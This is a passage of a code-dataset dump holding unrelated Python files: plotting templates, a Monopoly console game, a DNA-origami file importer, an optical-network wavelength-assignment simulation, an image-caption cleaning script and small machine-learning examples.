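print(coverage(actuals, bands))  # 2 of 3 points covered -> ~0.667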
plt.plot([i], [predicted[i]], marker='x', color='black')\n break\n\n if not plotted:\n plt.plot([i], [a], marker='o', color='red')\n\n ax = plt.gca()\n ax.grid(False)\n fig = plt.gcf()\n fig.set_size_inches(14, 8)\n\n self._format(**kwargs)\n self._save(rstr, bbox_inches='tight')\n\n","sub_path":"src/intervals/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116922654","text":"from matplotlib import pyplot as plt\nimport random\nimport matplotlib\nfrom matplotlib import font_manager\n\n# On Windows, matplotlib.rc can be used to configure a Chinese font\n# On mac/linux, set a Chinese font via matplotlib's font_manager\n\n# If the Chinese font name is hard to remember or unclear:\n# plt.rcParams['font.sans-serif']=['SimHei'] # to render Chinese labels correctly\n# plt.rcParams['axes.unicode_minus']=False # to render minus signs on the axes correctly\n# # where Chinese text appears, use u'content'\n\n# font = {\n# 'family' : 'SimHei',\n# 'weight' : 'bold',\n# 'size' : '10'\n# }\n# matplotlib.rc('font', **font)\n\n# This approach works on any OS; on Windows, search the fonts under C:\Windows\Fonts (e.g. simfang.ttf) to get the exact font path\nmy_font = font_manager.FontProperties(fname='C:\Windows\Fonts\simfang.ttf')\n\nx = range(0,120)\ny = [random.randint(20,35) for i in range(120)]\n\nplt.figure(figsize=(20,8), dpi=80)\n\nxtick_labels = [ \"10:{}\".format(i) if i>9 else \"10:0\"+str(i) for i in range(60) ]\n\nxtick_labels += [ \"11点{}\".format(i) if i>9 else \"11:0\"+str(i) for i in range(60) ]\n# xtick_labels += [ \"11:{}\".format(i) for i in range(60) ]\n\n# When the x-axis ticks are strings, passing xtick_labels with the same step as list(x) replaces the numeric ticks; rotation rotates the tick labels\n# Chinese tick text needs an explicit font property or it will not render\nplt.xticks(list(x)[::5], xtick_labels[::5], rotation=45, fontproperties=my_font)\nplt.yticks(y)\nplt.plot(x, y, label='温度', c=\"blue\", linestyle=\"--\", linewidth=2, alpha=0.5)\nplt.plot(x, [i+1 for i in y], label=\"温度+\", c=\"red\")\n\n# Add axis labels and a title\nplt.xlabel(\"时间\",fontproperties=my_font)\nplt.ylabel(\"温度 单位℃\", fontproperties=my_font)\nplt.title(\"10点到12点的气温变化情况\", fontproperties=my_font)\n\n# Add a grid; alpha sets transparency\n# plt.grid(axis='x', color='b', linestyle='-')\nplt.grid(linestyle='-')\n\n# Add the legend; prop is the argument needed for Chinese text, loc sets the position (default is 'best')\nplt.legend(prop=my_font, loc=\"upper left\")\nplt.xlim((1,50))\nplt.show()\n","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97068484","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 3 10:55:40 2012\n\n@author: rohan\n\"\"\"\n\nimport dana, numpy\n\n\nn=60\ndt=0.1\nalpha=10.0\ntau=1.0\nh=0.0\n\nI=dana.zeros((n,n))\nU=dana.zeros((n,n))\n\nU.connect(I.V,numpy.ones((1,1,)),'I',sparse=True)\n\nK = 1.25*dana.gaussian((2*n+1,2*n+1),0.1)- 0.7*dana.gaussian((2*n+1,2*n+1),1)\n\nU.connect(U.V,K,'L',shared=True)\n\nU.dV = '-V + maximum(V+dt/tau*(-V+(L/(n*n)*10*10+I+h)/alpha),0)'\n\nI.V = dana.gaussian((n,n), 0.2, ( 0.5, 0.5))\nI.V += dana.gaussian((n,n), 0.2, (-0.5,-0.5))\nI.V += (2*numpy.random.random((n,n))-1)*.05\n\nfor i in range(250):\n U.compute(dt)\n\n\ndana.pylab.view([I.V,U.V]).show()\n","sub_path":"dana_test.py","file_name":"dana_test.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"56085943","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 12:55:21 2018\n\n@author: Joshua Hew\n\"\"\"\n# TODO: Test player in jail functions\n# TODO: Code end_player_turn function\n# TODO: Add better logging, figure out which information to log\n# TODO: Code
chance and community chest tiles\n# TODO: Code owned property menu/ options\n\n\nimport menu_system as ms\nimport board\nimport dice\nimport player\n\nimport itertools\nimport logging\n\nlogging.basicConfig(filename='game_log.log', filemode='w', level=logging.DEBUG,\n format='%(levelname)s:%(msg)s')\n \nclass Game(object):\n \"\"\" Controls logic of game.\"\"\"\n \n def __init__(self):\n \n self.MAX_NUM_PLAYERS = 4 # Maximum number of players allowed\n self.player_list = [] # Players in game\n self.current_player = None # Current player/ player turn\n self.cp_cycle = None # Cycles through player_list\n self.round_counter = 0 # Number of rounds Game has cycled through\n self.dice = dice.Dice() # Game dice \n \n \n # Test logging \n logging.debug('Game Created') \n logging.info('Hello Log')\n \n # Setup Game \n print(\"Welcome to Console Monopoly!\")\n self.change_game_settings() \n \n # Create player cycler\n self.cp_cycle = itertools.cycle(self.player_list)\n \n # The first player created gets the first turn\n self.current_player = next(self.cp_cycle) \n \n # Start the main game loop\n self.main() \n\n \n \n def change_game_settings(self):\n \"\"\" Called by Game.init in order to setup game \"\"\"\n \n while True:\n # Display Game's Setup Menu: 1. Add Player. 2. Start Game\n print(\"\\n\\t\\t\\tSetup Menu: \")\n ms.display_menu(ms.setup_menu)\n \n # Collect user input. Menu option selection\n selection = input(\"Select an option by typing a number: \")\n \n # Choose option based on user input\n num_players = len(self.player_list) # Current amount of players in game\n if selection == '1': # Adds a Player to the game\n if num_players < self.MAX_NUM_PLAYERS: \n player_name = input(\"Please enter player name: \")\n self.player_list.append(player.Player(player_name))\n \n else:\n print(\"Error: Cannot have more than {} players!\".format( self.MAX_NUM_PLAYERS)) #DEBUG\n \n elif selection == '2': # Starts Game. There must be at least 1 player\n if num_players > 0:\n break\n \n else:\n print(\"Error: Cannot start game without players\")\n \n else:\n print(\"Unknown option selected!\")\n \n def start_player_turn(self, player):\n \"\"\" Monopoly consists of turns. Each turn a player can choose to do something \"\"\"\n \n \n if player.is_in_jail:\n # Default jail sentence time is 3 turns\n did_his_time = player.num_turns_in_jail == 3\n \n if did_his_time:\n # Move player from in_jail to 'just visiting'\n player.get_out_of_jail()\n \n print(\"{} has served his sentence. {} is now out of jail.\".format(player.name, \n player.name))\n logging.info(\"{} is out of jail.\".format(player.name))\n \n else:\n #increment current_player.num_turns_in_jail\n player.num_turns_in_jail += 1\n \n print(\"{} is serving jail sentence {} of 3.\".format(player.name, \n player.num_turns_in_jail))\n \n while player.is_in_jail:\n # Display in_jail_menu\n print(\"\\n\\t\\t\\tPlayer in Jail Menu: \")\n ms.display_menu(ms.player_in_jail_menu)\n \n # Collect user input. Menu option selection\n selection = input(\"Select an option by typing a number: \")\n \n # Select option\n if selection == '1': # 1. Roll Dice. Try to get doubles\n self.dice.roll()\n \n # If rolled doubles, player gets out of jail\n if self.dice.rolled_doubles:\n player.get_out_of_jail()\n \n else:\n # If player doesn't roll doubles, continue player turn cycle\n break\n \n # Reset dice for next use\n self.dice.reset()\n \n elif selection == '2': # 2. 
Use Get Out of Jail Free Card\n player.get_out_of_jail_free_card()\n \n # If player got out of jail, break out of in-jail-menu\n if player.is_in_jail == False:\n break\n \n # If player did not have card, start loop over \n else:\n continue\n \n elif selection == '3': # 3. Tough it out \n print(\"{} chose to tough it out.\".format(player.name))\n logging.info(\"{} chose to tough it out.\".format(player.name)) \n \n break\n \n else:\n print(\"Unknown option selected!\")\n \n \n elif player.is_bankrupt: \n # Remove player from game\n self.player_list.remove(player)\n \n else: # If player is neither bankrupt nor in jail\n while True:\n # Display player menu\n print(\"\\n\\t\\t\\tPlayer Menu:\")\n ms.display_menu(ms.player_menu)\n \n # Collect user input\n selection = input(\"Select an option by typing a number: \")\n \n # Choose option based on user input\n if selection == '1': # Roll Dice. Move player\n \n # Roll dice\n move_amount = self.dice.roll()\n \n # If player has rolled three doubles, go to jail\n if self.dice.doubles_counter == 3:\n player.go_to_jail()\n \n else: \n # Pass dice roll value to player's movement function\n player.move(move_amount)\n break\n \n # If player got sent to jail after moving, break out of player options\n if player.is_in_jail == False and self.dice.rolled_doubles:\n # PLayer gets to go again\n continue\n \n # Break out of player menu\n break\n \n \n elif selection == '2':\n player.display_owned_properties()\n \n # Let player see options again\n continue\n \n else:\n print(\"Unknown option selected!\")\n \n def end_player_turn(self, player):\n \n self.round_counter += 1\n self.current_player = next(self.cp_cycle)\n \n def main(self):\n \n self.round_counter = 1\n \n while True:\n print(\"Round {}.\".format(self.round_counter))\n print(\"Current Turn: {}.\".format(self.current_player.name))\n logging.info(\"Round {}\".format(self.round_counter))\n \n self.start_player_turn(self.current_player)\n self.end_player_turn(self.current_player)\n \n \n \nif __name__ == \"__main__\": \n \n Game()\n \n \n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"console_monopoly.py","file_name":"console_monopoly.py","file_ext":"py","file_size_in_byte":8576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410821143","text":"import numpy as np\nimport math\n\nx = [2, -1, 3, -2, 2, 2, 1, -4, 5, 1] # input\nw = [-1, -1, 1, -1, 1, -1, 1, 1, -1, 1] # weight vector\n\nx_dot_w = np.dot(x,w) # -3\nprob_class_zero = 1-(1/(1+math.e**(-(-3))))\nprint(prob_class_zero) # 95% sure it's class 0 and 5% sure it's class 1\n\nx = np.multiply(0.05,x) # nudge x vectors in positive direction by multiplying with 0.05\n\nx_dot_w = np.dot(x,w)\nprob_class_zero = 1-(1/(1+math.e**(-(x_dot_w))))\nprint(prob_class_zero) # changed probability from 95% to 53% by 0.05 change","sub_path":"tutorial/binary_regression_example.py","file_name":"binary_regression_example.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133331235","text":"# The MIT License\n#\n# Copyright (c) 2011 Wyss Institute at Harvard University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the 
Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n# http://www.opensource.org/licenses/mit-license.php\n\n\"\"\"\njson_io.py\n\nCreated by Nick Conway on 2011-01-19.\n\nHouses code that parses legacy (cadnano1) files.l\n\"\"\"\n\nimport json\nfrom document import Document\nfrom dnahoneycombpart import DNAHoneycombPart\nfrom dnasquarepart import DNASquarePart\nfrom virtualhelix import VirtualHelix\nfrom enum import StrandType\n\n# from PyQt4.QtGui import QColor\nimport util\n# import Qt stuff into the module namespace with PySide, PyQt4 independence\nutil.qtWrapImport('QtGui', globals(), ['QColor'])\n\nNODETAG = \"node\"\nNAME = \"name\"\nOBJ_ID = \"objectid\"\nINST_ID = \"instanceid\"\nDONE = \"done\"\nCHECKED = \"check\"\nLOCKED = \"locked\"\n\nVHELIX = \"vhelix\"\nNUM = \"num\"\nCOL = \"col\"\nROW = \"row\"\nSCAFFOLD = \"scaffold\"\nSTAPLE = \"staple\"\nINSERTION = \"insertion\"\nDELETION = \"deletion\"\n\ndef doc_from_legacy_dict(obj):\n \"\"\"\n take a loaded legacy dictionary, returns a loaded Document\n \"\"\"\n doc = Document()\n part = DNAHoneycombPart() # TODO must generalize\n doc.addPart(part)\n part.setName(obj[\"name\"])\n #self.addVirtualHelixAt(coord, vh, requestSpecificIdnum=num, noUndo=True)\n numBases = len(obj['vstrands'][0]['scaf'])\n part.setDimensions((30, 32, numBases))\n for helix in obj['vstrands']:\n row = helix['row']\n col = helix['col']\n scaf= helix['scaf']\n vh = VirtualHelix(numBases=len(scaf), idnum=helix['num'])\n part.addVirtualHelixAt((row,col), vh, requestSpecificIdnum=helix['num'], noUndo=True)\n helixNo, numHelixes = -1, len(obj['vstrands'])\n for helix in obj['vstrands']:\n helixNo += 1\n # print \"helix %i/%i (%i%%)\"%(helixNo, numHelixes, helixNo*100/numHelixes)\n vh = part.getVirtualHelix(helix['num'])\n scaf = helix['scaf']\n stap = helix['stap']\n loops = helix['loop']\n skips = helix['skip']\n assert(len(scaf)==len(stap) and len(stap)==vh.numBases() and\\\n len(scaf)==len(loops) and len(loops)==len(skips))\n for i in range(len(scaf)):\n fiveVH, fiveIdx, threeVH, threeIdx = scaf[i]\n threeVH = part.getVirtualHelix(threeVH)\n # Installing an Xover works on the same strand\n # as well (there is nothing inherently different\n # between an Xover and a same-strand linkage\n # in our current model)\n if threeVH==-1 or threeIdx==-1:\n continue\n \n vh.installXoverFrom3To5(StrandType.Scaffold, i, threeVH, threeIdx, undoable=False, speedy=True)\n for i in range(len(stap)):\n fiveVH, fiveIdx, threeVH, threeIdx = stap[i]\n threeVH = part.getVirtualHelix(threeVH)\n if threeVH==-1 or threeIdx==-1:\n continue\n vh.installXoverFrom3To5(StrandType.Staple, i, threeVH, threeIdx, undoable=False, speedy=True)\n for baseIdx, colorNumber in helix['stap_colors']:\n color = QColor((colorNumber>>16)&0xFF, (colorNumber>>8)&0xFF, colorNumber&0xFF)\n vh.applyColorAt(color, StrandType.Staple, 
baseIdx, undoable=False)\n for i in range(len(stap)):\n combinedLoopSkipAmount = loops[i] + skips[i]\n if combinedLoopSkipAmount != 0:\n vh.installLoop(StrandType.Scaffold, i, combinedLoopSkipAmount, undoable=False)\n return doc\n","sub_path":"model/json_io.py","file_name":"json_io.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"367536074","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8\n#\n# GA: RWA with GOF\n# Genetic Algorithm: \n# Routing and Wavelength Assignment with General Objective Function\n#\n# Copyright 2017 Universidade Federal do Pará (PPGCC UFPA)\n#\n# Authors: April 2017\n# Cassio Batista - https://cassota.gitlab.io/\n\n# Last revised on June 2020\n\n# REFERENCES:\n# [1] Afonso Jorge F. Cardoso et. al., 2010\n# A New Proposal of an Efficient Algorithm for Routing and Wavelength \n# Assignment (RWA) in Optical Networks\n# [2] https://la.mathworks.com/matlabcentral/fileexchange/4797-wdm-network-blocking-computation-toolbox\n\nimport sys\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport info\nfrom rwa.ga import rwa_ga # genetic algorithm + gof\nfrom rwa.fixed import rwa_fix # dijkstra + first fit\nfrom rwa.std_fixed import rwa_std_fix # dijkstra + graph coloring\nfrom rwa.alternate import rwa_alt # yen + first fit\nfrom rwa.std_alternate import rwa_std_alt # yen + graph coloring\nif info.USE_NSF:\n from net import nsf as net\nelif info.USE_CLARA:\n from net import clara as net\nelif info.USE_RNP:\n from net import rnp as net\nelif info.USE_JANET:\n from net import janet as net\n\n\ndef get_wave_availability(k, n):\n return (int(n) & ( 1 << k )) >> k\n\ndef write_results_to_disk(dictmap):\n if not os.path.isdir(info.RESULTS_DIR):\n os.mkdir(info.RESULTS_DIR)\n for filename, blocklist in dictmap.items():\n with open(os.path.join(info.RESULTS_DIR, filename), 'a') as f:\n for b in blocklist:\n f.write(' %7.3f' % b)\n f.write('\\n')\n\ndef plot_result_graphs(filelist):\n for f in filelist:\n data = np.loadtxt(os.path.join(info.RESULTS_DIR, f))\n if data.ndim == 1:\n plt.plot(data, '--')\n else:\n plt.plot(data.mean(axis=0), '--')\n if data.ndim == 1 or data.shape[0] < 10:\n print(f, data.shape, end=' ')\n print('remember you should simulate at least 10 times')\n plt.grid()\n plt.ylabel('Blocking probability (%)', fontsize=18)\n plt.xlabel('Load (Erlangs)', fontsize=18)\n plt.title('Average mean blocking probability', fontsize=20)\n plt.legend(filelist)\n plt.show(block=True)\n\nif __name__ == '__main__':\n\n nsf_wave, nsf_adj, nsf_time, nsf_links = net.generate()\n\n blocked_ga = []\n blocked_std_fix = []\n blocked_std_alt = []\n blocked_alt = []\n blocked_fix = []\n\n # should comment this\n if False and info.DEBUG:\n print(nsf_wave)\n\n # ascending loop through Erlangs\n for load in range(info.SIM_MIN_LOAD, info.SIM_MAX_LOAD):\n N_ga = nsf_wave.copy()\n N_std_fix = nsf_wave.copy()\n N_std_alt = nsf_wave.copy()\n N_alt = nsf_wave.copy()\n N_fix = nsf_wave.copy()\n\n T_ga = nsf_time.copy() # holding time\n T_std_fix = nsf_time.copy() # holding time\n T_std_alt = nsf_time.copy() # holding time\n T_alt = nsf_time.copy() # holding time\n T_fix = nsf_time.copy() # holding time\n\n paths_fix = []\n paths_alt = []\n\n count_block_ga = 0\n count_block_std_fix = 0\n count_block_std_alt = 0\n count_block_alt = 0\n count_block_fix = 0\n\n for gen in range(info.SIM_NUM_GEN):\n\n # Poisson arrival is here modelled as an exponential 
distribution\n # of times, according to Pawełczak MATLAB package [2]:\n # @until_next: time until next call arrives\n # @holding_time: time an allocated call occupies net resources\n until_next = -np.log(1-np.random.rand())/load \n holding_time = -np.log(1-np.random.rand())\n\n count_block_ga += rwa_ga(N_ga, nsf_adj, T_ga, holding_time)\n count_block_std_fix += rwa_std_fix(N_std_fix, nsf_adj, T_std_fix, holding_time, paths_fix)\n count_block_std_alt += rwa_std_alt(N_std_alt, nsf_adj, T_std_alt, holding_time, paths_alt)\n count_block_alt += rwa_alt(N_alt, nsf_adj, T_alt, holding_time)\n count_block_fix += rwa_fix(N_fix, nsf_adj, T_fix, holding_time)\n\n if info.DEBUG:\n sys.stdout.write('\\rLoad: %02d/%02d ' % (load, info.SIM_MAX_LOAD-1))\n sys.stdout.write('Simul: %04d/%04d\\t' % (gen+1, info.SIM_NUM_GEN))\n sys.stdout.write('GA: %04d, ' % count_block_ga)\n sys.stdout.write('STF: %04d, ' % count_block_std_fix)\n sys.stdout.write('STA: %04d, ' % count_block_std_alt)\n sys.stdout.write('ALT: %04d, ' % count_block_alt)\n sys.stdout.write('FIX: %04d ' % count_block_fix)\n sys.stdout.flush()\n\n aux_fix = {idx:[] for idx in range(info.NUM_CHANNELS)}\n aux_alt = {idx:[] for idx in range(info.NUM_CHANNELS)}\n # Update all channels that are still in use\n for link in nsf_links:\n i, j = link\n for w in range(info.NUM_CHANNELS):\n\n # GA + GOF\n if T_ga[i][j][w] > until_next:\n T_ga[i][j][w] -= until_next\n T_ga[j][i][w] = T_ga[i][j][w]\n else:\n T_ga[i][j][w] = 0\n T_ga[j][i][w] = 0\n if not get_wave_availability(w, N_ga[i][j]):\n N_ga[i][j] += 2**w # free channel\n N_ga[j][i] = N_ga[i][j] \n\n # Dijkstra + Graph coloring\n if T_std_fix[i][j][w] > until_next:\n T_std_fix[i][j][w] -= until_next\n T_std_fix[j][i][w] = T_std_fix[i][j][w]\n else:\n T_std_fix[i][j][w] = 0\n T_std_fix[j][i][w] = 0\n if not get_wave_availability(w, N_std_fix[i][j]):\n N_std_fix[i][j] += 2**w # free channel\n N_std_fix[j][i] = N_std_fix[i][j] \n aux_fix[w].append((i,j))\n aux_fix[w].append((j,i))\n\n # Yen + Graph coloring\n if T_std_alt[i][j][w] > until_next:\n T_std_alt[i][j][w] -= until_next\n T_std_alt[j][i][w] = T_std_alt[i][j][w]\n else:\n T_std_alt[i][j][w] = 0\n T_std_alt[j][i][w] = 0\n if not get_wave_availability(w, N_std_alt[i][j]):\n N_std_alt[i][j] += 2**w # free channel\n N_std_alt[j][i] = N_std_alt[i][j] \n aux_alt[w].append((i,j))\n aux_alt[w].append((j,i))\n\n # Yen + First-fit\n if T_alt[i][j][w] > until_next:\n T_alt[i][j][w] -= until_next\n T_alt[j][i][w] = T_alt[i][j][w]\n else:\n T_alt[i][j][w] = 0\n T_alt[j][i][w] = 0\n if not get_wave_availability(w, N_alt[i][j]):\n N_alt[i][j] += 2**w # free channel\n N_alt[j][i] = N_alt[i][j] \n\n # Dijkstra + First-fit\n if T_fix[i][j][w] > until_next:\n T_fix[i][j][w] -= until_next\n T_fix[j][i][w] = T_fix[i][j][w]\n else:\n T_fix[i][j][w] = 0\n T_fix[j][i][w] = 0\n if not get_wave_availability(w, N_fix[i][j]):\n N_fix[i][j] += 2**w # free channel\n N_fix[j][i] = N_fix[i][j] \n\n pop_fix = []\n for path in paths_fix:\n R, color = path\n count = 0\n if color == None:\n continue\n for r in range(len(R)-1):\n rcurr = R[r]\n rnext = R[r+1]\n if (rcurr,rnext) in aux_fix[color]:\n count += 1\n if count == len(R)-1:\n pop_fix.append(paths_fix.index(path))\n\n pop_fix.sort() # make sure the last elements are popped first\n while len(pop_fix):\n paths_fix.pop(pop_fix.pop())\n\n pop_alt = []\n for path in paths_alt:\n R, color = path\n count = 0\n if color == None:\n continue\n for r in range(len(R)-1):\n rcurr = R[r]\n rnext = R[r+1]\n if (rcurr,rnext) in 
aux_alt[color]:\n count += 1\n if count == len(R)-1:\n pop_alt.append(paths_alt.index(path))\n\n pop_alt.sort() # make sure the last elements are popped first\n while len(pop_alt):\n paths_alt.pop(pop_alt.pop())\n\n blocked_ga.append(100.0*count_block_ga/info.SIM_NUM_GEN)\n blocked_std_fix.append(100.0*count_block_std_fix/info.SIM_NUM_GEN)\n blocked_std_alt.append(100.0*count_block_std_alt/info.SIM_NUM_GEN)\n blocked_alt.append(100.0*count_block_alt/info.SIM_NUM_GEN)\n blocked_fix.append(100.0*count_block_fix/info.SIM_NUM_GEN)\n print('Done')\n\n if info.DEBUG:\n print('Results for this simulation:')\n print(' GA: ', ' '.join(['%6.2f' % b for b in blocked_ga]))\n print(' STF:', ' '.join(['%6.2f' % b for b in blocked_std_fix]))\n print(' STA:', ' '.join(['%6.2f' % b for b in blocked_std_alt]))\n print(' ALT:', ' '.join(['%6.2f' % b for b in blocked_alt]))\n print(' FIX:', ' '.join(['%6.2f' % b for b in blocked_fix]))\n\n # easy association between filenames and block list data structures\n f_ds = {'ga.txt': blocked_ga,\n 'fix.txt': blocked_fix, 'alt.txt': blocked_alt,\n 'std_fix.txt': blocked_std_fix, 'std_alt.txt': blocked_std_alt }\n\n write_results_to_disk(f_ds)\n if info.PLOT_RESULTS:\n plot_result_graphs(f_ds.keys())\n","sub_path":"python/sim_rwa.py","file_name":"sim_rwa.py","file_ext":"py","file_size_in_byte":10219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541031712","text":"import string\n\n# load text file into memory\ndef load_doc(filename):\n # opening file\n file = open(filename, 'r')\n text = file.read()\n file.close()\n # text variable contains all the information in string format\n return text\n\n# get all images with their captions\ndef all_img_captions(filename):\n file = load_doc(filename)\n captions = file.split('\\n')\n\n # this dictionary contains image ID as key and values as list of captions\n descriptions ={}\n\n for caption in captions[:-1]:\n img, caption = caption.split('\\t')\n\n if img[:-2] not in descriptions:\n descriptions[img[:-2]] = list(caption)\n else:\n descriptions[img[:-2]].append(caption)\n\n return descriptions\n\n# this is for cleaning the data i.e all lower case letters, removing digits, remove punctuations\ndef cleaning_text(descriptions):\n table = str.maketrans('','',string.punctuation)\n\n for img,caps in descriptions.items():\n for i,img_caption in enumerate(caps):\n\n img_caption.replace(\"-\",\" \")\n desc = img_caption.split()\n\n # converts to lowercase\n desc = [word.lower() for word in desc]\n\n # remove punctuation from each token\n desc = [word.translate(table) for word in desc]\n\n # remove hanging 's and a \n desc = [word for word in desc if(len(word)>1)]\n\n # remove tokens with numbers in them\n desc = [word for word in desc if(word.isalpha())]\n\n # convert back to string\n img_caption = ' '.join(desc)\n\n descriptions[img][i]= img_caption\n\n return descriptions\n\n# this is used to seperate all unique words and create a vocabulary from descriptions\ndef text_vocabulary(descriptions):\n # build vocabulary of all unique words\n vocab = set()\n for key in descriptions.keys():\n [vocab.update(d.split()) for d in descriptions[key]]\n return vocab\n\n#All descriptions in one file as descriptions.txt\ndef save_descriptions(descriptions, filename):\n lines = list()\n for key, desc_list in descriptions.items():\n for desc in desc_list:\n lines.append(key + '\\t' + desc )\n data = \"\\n\".join(lines)\n file = open(filename,\"w\")\n file.write(data)\n file.close()\n\n# Set these 
path according to project folder in you system\ndataset_text = \"src/flickr8k/Flickr_TextData\"\n\n#we prepare our text data\nfilename = dataset_text + \"/\" + \"Flickr8k.token.txt\"\n\n#loading the file that contains all data\n#mapping them into descriptions dictionary img to 5 captions\ndescriptions = all_img_captions(filename)\nprint(\"Length of descriptions =\" ,len(descriptions))\n\n#cleaning the descriptions\nclean_descriptions = cleaning_text(descriptions)\n\n#building vocabulary \nvocabulary = text_vocabulary(clean_descriptions)\nprint(\"Length of vocabulary = \", len(vocabulary))\n\n#saving each description to file \nsave_descriptions(clean_descriptions, \"src/descriptions.txt\")\n","sub_path":"description_generator.py","file_name":"description_generator.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473711826","text":"#!/usr/bin/python\nimport RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(1)\nGPIO.setup(3,GPIO.OUT)\nGPIO.setup(5,GPIO.OUT)\nGPIO.output(3,1)\nfor i in range(10):\n\t#print i\n\tGPIO.output(3,1)\n\t\n\tGPIO.output(5,1)\n\ttime.sleep(5/1000000)\n\tGPIO.output(5,0)\n\ttime.sleep(5/1000000)\nGPIO.output(3,1)\n\nGPIO.setup(3,GPIO.IN)\nGPIO.setup(5,GPIO.IN)\n\n\n","sub_path":"kivytest01/old/scl_down.py","file_name":"scl_down.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91944978","text":"# -*- encoding: utf-8 -*-\nimport sys\nr_input = sys.stdin.readline\n\n\ndef run():\n N = int(r_input())\n dp = [2, 6, 16]\n gap = [4, 10]\n\n if N < 3:\n print(dp[N - 1] + 1)\n exit()\n\n result = 16\n\n for _ in range(N - 3):\n gap[0], gap[1] = gap[1], (gap[1] * 2 + gap[0]) % 9901\n result += gap[1]\n\n print((result + 1) % 9901)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"Algorithm/Baekjoon/01309 동물원/1309.py","file_name":"1309.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"201497247","text":"import pytest\nfrom mantisshrimp import *\n\n\n@pytest.mark.parametrize(\"model_class\", [MantisFasterRCNN, MantisMaskRCNN])\ndef test_simple_backbone_default_param_groups(model_class, simple_backbone):\n model = model_class(num_classes=2, backbone=simple_backbone)\n assert model.param_groups == [\n simple_backbone,\n model.model.rpn,\n model.model.roi_heads,\n ]\n\n\n@pytest.mark.parametrize(\"model_class\", [MantisFasterRCNN, MantisMaskRCNN])\ndef test_simple_backbone_custom_param_groups(model_class, simple_backbone):\n backbone_param_groups = [simple_backbone.c1, simple_backbone.c2]\n model = model_class(\n num_classes=16, backbone=simple_backbone, param_groups=backbone_param_groups\n )\n expected = backbone_param_groups + [model.model.rpn, model.model.roi_heads]\n assert model.param_groups == expected\n\n\n@pytest.mark.parametrize(\"model_class\", [MantisFasterRCNN, MantisMaskRCNN])\ndef test_default_backbone_default_param_groups(model_class):\n model = model_class(num_classes=42)\n backbone_param_groups = resnet_fpn_backbone_param_groups(model.model.backbone)\n expected = backbone_param_groups + [model.model.rpn, model.model.roi_heads]\n assert len(model.param_groups) == len(expected)\n # check by weight values, not layer reference\n for pg1, pg2 in zip(backbone_param_groups, expected):\n assert list(pg1.parameters()) == 
list(pg2.parameters())\n","sub_path":"tests/models/mantis_rcnn/test_parameter_groups.py","file_name":"test_parameter_groups.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114046300","text":"import numpy as np\r\n\r\nclass Adaline:\r\n \r\n \r\n def __init__(self, data, d, learning_rate = 0.5):\r\n self.X = np.ones((len(data),1), dtype=int)\r\n self.X = np.c_[(self.X,data)]\r\n self.d = d\r\n self.learning_rate = learning_rate\r\n self.epochs = 0\r\n self.W = np.random.rand(len(self.X[0,:]))\r\n self.Train = 0\r\n \r\n def trainning(self):\r\n \r\n error = True\r\n \r\n while(error and self.epochs <= 1000):\r\n \r\n self.epochs += 1\r\n error = False\r\n acerto = 0\r\n \r\n for i in range(len(self.X)):\r\n u = self.X[i,:].dot(self.W)\r\n y = self.stepFunction(u)\r\n \r\n if y != self.d[i]:\r\n error = True\r\n for j in range(len(self.W)):\r\n self.W[j] = self.W[j] + self.learning_rate * (self.d[i] - u) * self.X[i,j]\r\n else:\r\n acerto +=1\r\n \r\n acertoPorct = (acerto/len(self.X))*100\r\n self.Train = np.append(self.Train, acertoPorct)\r\n print(self.epochs)\r\n \r\n def execute(self, data):\r\n # cria uma matriz nova para criação\r\n if np.ndim(data) == 1:\r\n 